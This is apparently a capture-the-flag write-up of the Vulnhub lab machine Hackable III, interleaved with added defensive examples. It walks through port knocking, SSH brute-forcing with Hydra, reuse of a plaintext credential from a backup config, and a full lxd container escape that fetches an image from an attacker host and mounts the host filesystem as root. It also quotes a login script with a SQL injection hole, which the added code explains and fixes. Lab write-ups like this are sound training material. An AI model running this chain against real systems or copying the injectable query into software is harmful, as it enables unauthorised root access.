There has been nothing good on THM for a little while now, so I’m working back through some older Vulnhub machines. Not that this is particularly old, but whatever. I had looz in my list so I thought I might do that; once I booted it up I remembered that I had already finished the box but hadn’t bothered writing it up. Ooof. Oh, and I’ve also done doubletrouble but haven’t written it up.
Anyway, this was HACKABLE: III.
Let’s Go
HTTP only. Let’s start pokin’ around. A comment in the page source on the webroot says:
Please, jubiscleudo, don’t forget to activate the port knocking when exiting your section, and tell the boss not to forget to approve the .jpg file - dev_suport@hackable3.com
So…sounds like port knocking. Robots.txt disallows /config, which contains 1.txt, which contains MTAwMDA=, which is 10000 in base64. That’s our first port.
We find port 2 here: http://192.168.1.100/css/2.txt. This contains some brainfuck, which decodes to 4444; that’s our second port.
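The three hint files on this box each hide a port number in a different encoding (base64, brainfuck, and the plain "porta:N" text that comes out of the JPEG later on). Below is an added example, not part of the original write-up, that decodes all three forms with a small brainfuck interpreter and base64 fallback. The brainfuck program in it is a constructed stand-in that prints 4444, since the real contents of 2.txt are not reproduced in the write-up.

```python
import base64
import binascii
import re

# Constructed stand-in for /css/2.txt (the real file is not quoted in the post);
# it sets a cell to 52 ('4') and prints it four times.
SAMPLE_BRAINFUCK = "++++++++[>+++++++<-]>----...."

# Hint values as they appear on the page: 1.txt, (stand-in) 2.txt, and the stegseek output.
SAMPLE_HINTS = ["MTAwMDA=", SAMPLE_BRAINFUCK, "porta:65535"]


def run_brainfuck(program, max_steps=100_000):
    """Interpret a brainfuck program with no input and return what it prints."""
    code = [c for c in program if c in "<>+-.,[]"]
    jump, stack = {}, []
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unbalanced ']'")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unbalanced '['")
    tape, ptr, pc, out, steps = [0] * 30000, 0, 0, [], 0
    while pc < len(code):
        steps += 1
        if steps > max_steps:  # guard against a hint file that never terminates
            raise RuntimeError("step limit exceeded")
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        # ',' (input) is ignored: hint files take no input
        pc += 1
    return "".join(out)


def decode_hint(text):
    """Recover the digits hidden in one hint: plain 'porta:N' / 'N', base64, or brainfuck."""
    stripped = text.strip()
    plain = re.fullmatch(r"(?:porta:)?(\d+)", stripped)
    if plain:
        return plain.group(1)
    try:
        decoded = base64.b64decode(stripped, validate=True).decode("ascii")
        if decoded.isdigit():
            return decoded
    except (binascii.Error, UnicodeDecodeError):
        pass  # not base64, fall through to brainfuck
    return run_brainfuck(stripped)


def knock_sequence(hints):
    """Turn the decoded hints into a validated list of port numbers."""
    ports = []
    for hint in hints:
        value = decode_hint(hint)
        if not value.isdigit():
            raise ValueError("hint did not decode to a number: %r" % hint)
        port = int(value)
        if not 1 <= port <= 65535:
            raise ValueError("port out of range: %d" % port)
        ports.append(port)
    return ports


if __name__ == "__main__":
    print(knock_sequence(SAMPLE_HINTS))
```

The interpreter wraps cell values at 256 and caps the step count, so a malformed or looping hint file fails loudly instead of hanging.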
Viewing the source for http://192.168.1.100/login.php gives us:
<?php
include('config.php');
$usuario = $_POST['user'];
$senha = $_POST['pass'];
// user-supplied values are interpolated straight into the SQL string, unescaped
$query = "SELECT * FROM usuarios WHERE user = '{$usuario}' and pass = '{$senha}'";
$result = mysqli_query($conexao, $query);
$row = mysqli_num_rows($result);
# account validation
if ($row == 1) {
    $_SESSION['usuario'] = $usuario;
    header('Location: 3.jpg');
    exit();
} else {
    $_SESSION['nao_autenticado'] = true;
    header('Location: login_page/login.html');
    exit();
}
?>
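The login above builds its query by string interpolation, so anything the user types becomes part of the SQL. The following is an added example, not code from the box, that reproduces that query shape against an in-memory SQLite stand-in for the MySQL "usuarios" table (constructed sample row) and contrasts it with a parameterized query, where the same input is bound as data. In PHP the equivalent fix is mysqli_prepare() with bind_param().

```python
import sqlite3


def make_db():
    """In-memory stand-in for the box's 'hackable' database with one constructed user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE usuarios (user TEXT PRIMARY KEY, pass TEXT NOT NULL)")
    conn.execute("INSERT INTO usuarios VALUES ('jubiscleudo', 'sample-password')")
    conn.commit()
    return conn


def login_unsafe(conn, usuario, senha):
    """Same construction as login.php: the values are spliced into the SQL text."""
    query = "SELECT * FROM usuarios WHERE user = '%s' and pass = '%s'" % (usuario, senha)
    return len(conn.execute(query).fetchall()) == 1


def login_safe(conn, usuario, senha):
    """Parameterized form: the driver sends the values separately from the SQL."""
    query = "SELECT 1 FROM usuarios WHERE user = ? AND pass = ?"
    return conn.execute(query, (usuario, senha)).fetchone() is not None


def run_checks():
    """Exercise both versions with a valid login and with a username containing a quote."""
    conn = make_db()
    results = {
        "safe_valid": login_safe(conn, "jubiscleudo", "sample-password"),
        "safe_wrong_password": login_safe(conn, "jubiscleudo", "wrong"),
        # a quote in the input is just a character in the bound parameter
        "safe_quote_in_name": login_safe(conn, "o'brien", "x"),
        "unsafe_valid": login_unsafe(conn, "jubiscleudo", "sample-password"),
    }
    try:
        login_unsafe(conn, "o'brien", "x")
        results["unsafe_quote_breaks_sql"] = False
    except sqlite3.OperationalError:
        # the quote terminates the string literal and the rest is parsed as SQL
        results["unsafe_quote_breaks_sql"] = True
    return results


if __name__ == "__main__":
    for name, value in run_checks().items():
        print(name, value)
```

The table here mirrors the box in storing passwords in clear; a real deployment would store a salted hash and compare against it, which is a separate fix from the query construction shown.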
So, if we go get 3.jpg we can run stegseek on it…
┌──(root💀kali)-[/opt/vulnhub/hackable3]
└─# stegseek 3.jpg
StegSeek version 0.5
Progress: 0.00% (0 bytes)
[i] --> Found passphrase: ""
[i] Original filename: "steganopayload148505.txt"
[i] Extracting to "3.jpg.out"
┌──(root💀kali)-[/opt/vulnhub/hackable3]
└─# cat 3.jpg.out
porta:65535
And there’s our third port (porta is Portuguese for port). Note you don’t have to use three ports for port knocking, but it’s common in CTFs.
Let’s see if it works:
knock 192.168.1.100 10000 4444 65535
Re-run the port scan, and bingo we have SSH open.
SSH
We already had two potential usernames:
jubiscleudo, and
dev_suport
And in the course of our fuzzing the webserver, we turned up http://192.168.1.100/backup/wordlist.txt, which has 300 entries. I run it first with dev_suport with Hydra; no dice. But it’s bingo with jubiscleudo.
Once we get on, we have one other main user: hackable_3. We can find his password in /var/www/html/.backup_config.php:
<?php
/* Database credentials. Assuming you are running MySQL
   server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'hackable_3');
define('DB_PASSWORD', 'TrOLLED_3');
define('DB_NAME', 'hackable');
/* Attempt to connect to MySQL database */
$conexao = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if ($conexao === false) {
    die("ERROR: Could not connect. " . mysqli_connect_error());
} else {
}
?>
There is no mysql on the box, but TrOLLED_3 works for hackable_3 over SSH. hackable_3 is in the lxd group, and membership there is root-equivalent: we can launch a privileged container with the host filesystem mounted inside it, so that’s it:
hackable_3@ubuntu20:~$ wget http://192.168.1.210:9090/alpine-v3.14-x86_64-20210910_2324.tar.gz
--2021-09-17 12:12:38--  http://192.168.1.210:9090/alpine-v3.14-x86_64-20210910_2324.tar.gz
Connecting to 192.168.1.210:9090... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3253157 (3.1M) [application/x-tar]
Saving to: ‘alpine-v3.14-x86_64-20210910_2324.tar.gz’
alpine-v3.14-x86_64-20210910_2324.tar.gz 100%[================================================================================================================>] 3.10M --.-KB/s in 0.02s
2021-09-17 12:12:38 (172 MB/s) - ‘alpine-v3.14-x86_64-20210910_2324.tar.gz’ saved [3253157/3253157]
hackable_3@ubuntu20:~$ lxc image list
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04
+-------+-------------+--------+-------------+--------------+------+------+-------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+-------+-------------+--------+-------------+--------------+------+------+-------------+
hackable_3@ubuntu20:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]:
Do you want to configure a new storage pool? (yes/no) [default=yes]:
Name of the new storage pool [default=default]:
Name of the storage backend to use (lvm, zfs, ceph, btrfs, dir) [default=zfs]:
Create a new ZFS pool? (yes/no) [default=yes]:
Would you like to use an existing empty block device (e.g. a disk or partition)? (yes/no) [default=no]:
Size in GB of the new loop device (1GB minimum) [default=5GB]:
Would you like to connect to a MAAS server? (yes/no) [default=no]:
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like the LXD server to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:
hackable_3@ubuntu20:~$ lxc image import alpine-v3.14-x86_64-20210910_2324.tar.gz --alias alpine
Image imported with fingerprint: 1b9b6768ec27c8c3e20e09ccd8c1f3bc6a4a9e55b0a858926545c4ad3c88562b
hackable_3@ubuntu20:~$ lxc image list
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| ALIAS  | FINGERPRINT  | PUBLIC | DESCRIPTION                   | ARCHITECTURE | TYPE      | SIZE   | UPLOAD DATE                   |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
| alpine | 1b9b6768ec27 | no     | alpine v3.14 (20210910_23:24) | x86_64       | CONTAINER | 3.10MB | Sep 17, 2021 at 12:13pm (UTC) |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+-------------------------------+
hackable_3@ubuntu20:~$ lxc init alpine privesc -c security.privileged=true
Creating privesc
hackable_3@ubuntu20:~$ lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
Device host-root added to privesc
hackable_3@ubuntu20:~$ lxc start privesc
hackable_3@ubuntu20:~$ lxc exec privesc /bin/sh
~ # cd /mnt/root/root
/mnt/root/root # ls -lash
total 48K
4 drwx------ 6 root root 4.0K Jun 29 19:44 .
4 drwxr-xr-x 21 root root 4.0K Apr 29 16:32 ..
0 -rw------- 1 root root 0 Jun 30 20:46 .bash_history
4 -rw-r--r-- 1 root root 3.0K Aug 14 2019 .bashrc
4 drwx------ 2 root root 4.0K Apr 29 16:11 .cache
4 -rw------- 1 root root 28 Jun 29 19:44 .lesshst
4 drwxr-xr-x 3 root root 4.0K Apr 29 16:28 .local
4 -rw-r--r-- 1 root root 161 Sep 16 2020 .profile
4 -rw-r--r-- 1 root root 66 Apr 29 16:37 .selected_editor
4 drwx------ 2 root root 4.0K Apr 27 15:07 .ssh
4 -rwxr-xr-x 1 root root 46 Jun 28 23:21 knockrestart.sh
4 -rw------- 1 root root 2.7K Jun 28 23:41 root.txt
4 drwxr-xr-x 3 root root 4.0K Apr 27 15:07 snap
/mnt/root/root # cat root.txt
░░█▀░░░░░░░░░░░▀▀███████░░░░
░░█▌░░░░░░░░░░░░░░░▀██████░░░
░█▌░░░░░░░░░░░░░░░░███████▌░░
░█░░░░░░░░░░░░░░░░░████████░░
▐▌░░░░░░░░░░░░░░░░░▀██████▌░░
░▌▄███▌░░░░▀████▄░░░░▀████▌░░
▐▀▀▄█▄░▌░░░▄██▄▄▄▀░░░░████▄▄░
▐░▀░░═▐░░░░░░══░░▀░░░░▐▀░▄▀▌▌
▐░░░░░▌░░░░░░░░░░░░░░░▀░▀░░▌▌
▐░░░▄▀░░░▀░▌░░░░░░░░░░░░▌█░▌▌
░▌░░▀▀▄▄▀▀▄▌▌░░░░░░░░░░▐░▀▐▐░
░▌░░▌░▄▄▄▄░░░▌░░░░░░░░▐░░▀▐░░
░█░▐▄██████▄░▐░░░░░░░░█▀▄▄▀░░
░▐░▌▌░░░░░░▀▀▄▐░░░░░░█▌░░░░░░
░░█░░▄▀▀▀▀▄░▄═╝▄░░░▄▀░▌░░░░░░
░░░▌▐░░░░░░▌░▀▀░░▄▀░░▐░░░░░░░
░░░▀▄░░░░░░░░░▄▀▀░░░░█░░░░░░░
░░░▄█▄▄▄▄▄▄▄▀▀░░░░░░░▌▌░░░░░░
░░▄▀▌▀▌░░░░░░░░░░░░░▄▀▀▄░░░░░
▄▀░░▌░▀▄░░░░░░░░░░▄▀░░▌░▀▄░░░
░░░░▌█▄▄▀▄░░░░░░▄▀░░░░▌░░░▌▄▄
░░░▄▐██████▄▄░▄▀░░▄▄▄▄▌░░░░▄░
░░▄▌████████▄▄▄███████▌░░░░░▄
░▄▀░██████████████████▌▀▄░░░░
▀░░░█████▀▀░░░▀███████░░░▀▄░░
░░░░▐█▀░░░▐░░░░░▀████▌░░░░▀▄░
░░░░░░▌░░░▐░░░░▐░░▀▀█░░░░░░░▀
░░░░░░▐░░░░▌░░░▐░░░░░▌░░░░░░░
░╔╗║░╔═╗░═╦═░░░░░╔╗░░╔═╗░╦═╗░
░║║║░║░║░░║░░░░░░╠╩╗░╠═╣░║░║░
░║╚╝░╚═╝░░║░░░░░░╚═╝░║░║░╩═╝░
invite-me: linkedin.com/in/eliastouguinho
/mnt/root/root #
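The whole escalation above rests on one fact: a user in the lxd group (the same goes for docker, disk, sudo and wheel) is root-equivalent, and the LXD documentation says as much. The check an administrator wants is therefore "who is in those groups", including users whose primary GID in /etc/passwd points at one of them, which a glance at the group file alone misses. The script below is an added example, not part of the write-up; the group and passwd contents are constructed samples, and when run directly it audits the real files on the host.

```python
# Groups whose membership is equivalent to root on a typical Linux host.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "sudo", "wheel", "disk"}

# Constructed sample files (modelled on the box: hackable_3 is in lxd).
SAMPLE_GROUP = """\
root:x:0:
sudo:x:27:
disk:x:6:
lxd:x:131:hackable_3
docker:x:998:
users:x:100:jubiscleudo,hackable_3
# a comment line and a malformed line, both skipped
broken-line-without-fields
"""
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
jubiscleudo:x:1000:1000::/home/jubiscleudo:/bin/bash
hackable_3:x:1001:1001::/home/hackable_3:/bin/bash
svc_docker:x:1002:998::/var/lib/svc:/usr/sbin/nologin
"""


def parse_groups(text):
    """Map group name -> (gid, supplementary members) from /etc/group-style text."""
    groups = {}
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 4 or not fields[2].isdigit():
            continue  # malformed entry; ignore rather than crash
        name, _, gid, members = fields
        groups[name] = (int(gid), {m for m in members.split(",") if m})
    return groups


def parse_primary_gids(text):
    """Map user -> primary gid from /etc/passwd-style text."""
    primaries = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7 or not fields[3].isdigit():
            continue
        primaries[fields[0]] = int(fields[3])
    return primaries


def audit_root_equivalent(group_text, passwd_text, watch=ROOT_EQUIVALENT_GROUPS):
    """Return {group: sorted users} for every watched group that has any member."""
    groups = parse_groups(group_text)
    primaries = parse_primary_gids(passwd_text)
    findings = {}
    for name, (gid, members) in groups.items():
        if name not in watch:
            continue
        users = set(members)
        # primary-group membership is not listed in /etc/group, so add it here
        users.update(user for user, g in primaries.items() if g == gid)
        if users:
            findings[name] = sorted(users)
    return findings


if __name__ == "__main__":
    with open("/etc/group") as g, open("/etc/passwd") as p:
        for group, users in sorted(audit_root_equivalent(g.read(), p.read()).items()):
            print("%s: %s" % (group, ", ".join(users)))
```

On the sample data the script reports hackable_3 under lxd and svc_docker under docker (the latter only through its primary GID); each of those accounts should be treated as an administrator, and the group trimmed if that was not intended.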